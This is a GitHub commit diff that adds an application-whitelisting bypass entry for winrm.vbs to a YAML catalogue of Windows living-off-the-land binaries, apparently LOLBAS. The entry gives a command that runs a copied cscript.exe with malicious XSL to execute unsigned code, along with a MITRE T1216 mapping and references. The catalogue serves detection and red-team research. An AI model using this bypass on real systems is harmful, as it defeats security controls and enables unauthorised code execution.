Added AWL Bypass

This commit is contained in:
bohops 2018-10-04 10:07:02 -04:00 committed by GitHub
parent f8e9ac5a0a
commit 783b4f3d9f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -28,6 +28,14 @@ Commands:
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
Usecase: Execute aribtrary, unsigned code via XSL script
Category: AWL Bypass
Privileges: User
MitreID: T1216
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
OperatingSystem: Windows 10
Full Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs
@ -42,6 +50,8 @@ Resources:
- Link: https://github.com/enigma0x3/windows-operating-system-archaeology
- Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
- Link: https://twitter.com/bohops/status/994405551751815170
- Link: https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
- Link: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
Acknowledgement:
- Person: Matt Nelson
Handle: '@enigma0x3'
@ -51,4 +61,4 @@ Acknowledgement:
Handle: '@bohops'
- Person: Red Canary Company cc Tony Lambert
Handle: '@redcanaryco'
---
---